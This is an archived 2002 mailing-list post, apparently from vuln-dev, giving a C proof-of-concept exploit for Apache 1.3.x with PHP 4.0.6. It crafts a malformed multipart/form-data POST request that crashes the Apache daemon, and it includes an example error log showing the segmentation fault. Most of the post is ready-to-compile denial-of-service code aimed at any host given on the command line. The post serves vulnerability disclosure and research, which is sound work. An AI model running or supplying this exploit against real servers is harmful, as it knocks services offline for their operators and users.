Apache+php Proof of Concept Exploit

• Previous message: Moser Max: "Gina.dll research"
• Next in thread: Gabriel A. Maggiotti: "Re:Apache+php Proof of Concept Exploit"
• Reply: Gabriel A. Maggiotti: "Re:Apache+php Proof of Concept Exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Sun, 03 Mar 2002 05:16:46 -0300
From: "Gabriel A. Maggiotti" <gmaggiot@ciudad.com.ar>
To: vuln-dev@securityfocus.com

/*
---------------------------------------------------------------------------
Web: http://qb0x.net Author: Gabriel A. Maggiotti
Date: Febrary 03, 2002 E-mail: gmaggiot@ciudad.com.ar
---------------------------------------------------------------------------

Summary
-------
This is a proof of concept exploit for Apache/1.3.x + php_4.0.6. This
code exploit multipart/form-data POST requests bug. This code only crash
 apache deamon, not open any shell or execute code in the remote server.
PHP supports multipart/form-data POST requests (as described in RFC1867)
known as POST fileuploads. Unfourtunately there are several flaws in the
php_mime_split function that could be used by an attacker to execute arbi-
trary code. I dont know if the vuln I exploit is a known vuln or not.

Example:
-------

<quote>
[gabi@pluto logs]$ ./apache_php host 80 hi.php
[gabi@pluto logs]$ cat /www/logs/error_log

[Sun Mar 3 02:50:36 2002] [notice] child pid 26856 exit signal Segmentation
 fault (11)

[gabi@pluto logs]$
</quote>

Greets:
------
A special greets to Fernando Oubi#a and Sebastian Brocher, good friend of
mime.
 
An very special greets for a good friend and an excellent Security
Consultant Alex Hernandez!!!

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define MAX 1000
#define PORT 80

char *str_replace(char *rep, char *orig, char *string)
{
int len=strlen(orig);
char buf[MAX]="";
char *pt=strstr(string,orig);

strncpy(buf,string, pt-string );
strcat(buf,rep);
strcat(buf,pt+strlen(orig));
strcpy(string,buf);
return string;
}

int main(int argc,char *argv[MAX])
{
        int sockfd;
        int numbytes;
        int port;
        char *ptr;

        char POST_REQUEST[MAX] =
                "POST ##file HTTP/1.0\n"
                "Referer: http://host/xxxxxx/exp.php?hi_lames=haha\n"
                "Connection: Keep-Alive\nContent-type: multipart/for"
                "m-data; boundary=---------------------------1354088"
                "10612827886801697150081\nContent-Length: 567\n\n---"
                "--------------------------1354088106128278868016971"
                "50081\nContent-Disposition: form-data; name=\"lang_id\"";

        struct hostent *he;
        struct sockaddr_in their_addr;

        if(argc!=4)
        {
                fprintf(stderr,"usage:%s <hostname> <port> <php_file>\n",argv[0]);
                exit(1);
        }

        port=atoi(argv[2]);
        ptr=str_replace(argv[3],"##file",POST_REQUEST);
        //ptr=POST_REQUEST;

        if((he=gethostbyname(argv[1]))==NULL)
        {
                perror("gethostbyname");
                exit(1);
        }

        if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) {
                perror("socket"); exit(1);
        }

        their_addr.sin_family=AF_INET;
        their_addr.sin_port=htons(port);
        their_addr.sin_addr=*((struct in_addr*)he->h_addr);
        bzero(&(their_addr.sin_zero),8);

        if( connect(sockfd,(struct sockaddr*)&their_addr,\
                 sizeof(struct sockaddr))==-1)
        {
                perror("connect");
                exit(1);
        }

        
        if( send(sockfd,ptr,strlen(POST_REQUEST),0) ==-1)
        {
                perror("send");
                exit(0);
        }

        close(sockfd);

return 0;
}

/*
---------------------------------------------------------------------------
research-list@qb0x.net is dedicated to interactively researching vulnerab-
ilities, report potential or undeveloped holes in any kind of computer system.
To subscribe to research-list@qb0x.ne t send a blank email to
research-list-subscribe@qb0x.net. More help available sending an email
to research-list-help@qb0x.net.
Note: the list doesn't allow html, it will be stripped from messages.
---------------------------------------------------------------------------
*/

• Previous message: Moser Max: "Gina.dll research"
• Next in thread: Gabriel A. Maggiotti: "Re:Apache+php Proof of Concept Exploit"
• Reply: Gabriel A. Maggiotti: "Re:Apache+php Proof of Concept Exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages Apache+php Proof of Concept Exploit ... PHP supports multipart/form-data POST requests ... A very special greets for a good friend and an excellent Security ... int main ... (Bugtraq) [EXPL] Apache & PHP Proof of Concept Exploit ... PHP supports multipart/form-data POST requests ... int main ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam) Re:Apache+php Proof of Concept Exploit ... PHP supports multipart/form-data POST requests ... An very special greets for a good friend and an excellent Security ... int main ... (Vuln-Dev)

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint